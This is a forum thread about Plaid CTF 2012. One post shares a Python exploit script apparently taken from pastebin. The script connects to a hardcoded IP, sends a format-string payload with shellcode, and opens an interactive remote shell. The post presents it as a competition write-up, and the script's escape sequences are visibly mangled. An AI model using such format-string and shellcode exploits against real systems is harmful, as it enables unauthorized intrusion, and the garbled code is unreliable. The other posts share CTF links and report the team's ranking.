Jump to content











Photo

Plaid CTF 2012


  • Please log in to reply
28 replies to this topic

#26 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 15 April 2012 - 05:49 AM

....It gives a better idea of what it is....

For much better idea, few links follow

http://events.ccc.de.../2008/wiki/CTF/
http://www.cipher-ct...her3.php?edit=0
http://ictf.cs.ucsb....2007/howto.html
http://ructf.org/e/2011/network.html

#27 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 30 April 2012 - 09:25 AM

Here is one write up available from pastebin for pCTF 2012.


#!/bin/python

import socket,time

s = socket.socket()

s.connect(("23.20.104.208", 56345))

s.send('2ipzLTxTGOtJE0Umn')

off = s.recv(1024)

xpl = '%-252s' % ('x18x9Ex04x08x19x9Ex04x08x1Ax9Ex04x08x1Bx9Ex04x08%188X%19$n%15X%20$n%36X%21$n%22$n'+"x90"*80+"xebx11x5ex31xc9xb1x21x80x6cx0exffx01x80xe9x01x75xf6xebx05xe8xeaxffxffxffx6bx0cx59x9ax53x67x69x2ex71x8axe2x53x6bx69x69x30x63x62x74x69x30x63x6ax6fx8axe4x53x52x54x8axe2xcex81")

s.send(xpl+'n')

print s.recv(1024)

s.send('176363600n'); #this is one time password using gdb :)

s.recv(1024)

print s.recv(1024)

while (True):

cmd = raw_input("$ ")

print s.send(cmd+'n')

print s.recv(1024)



#28 Holmes.Sherlock

Holmes.Sherlock

    Gold Member

  • Team Reboot
  • 1444 posts
  • Location:Santa Barbara, California
  •  
    United States

Posted 30 April 2012 - 09:28 AM

Just for the record, Team Reboot ended up bagging 40 points & acquiring 173th position out of 709 different teams from different countries.
  • Nuno Brito likes this

#29 TheHive

TheHive

    Platinum Member

  • .script developer
  • 4138 posts

Posted 03 May 2012 - 05:33 AM

:1st: :party_time:




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users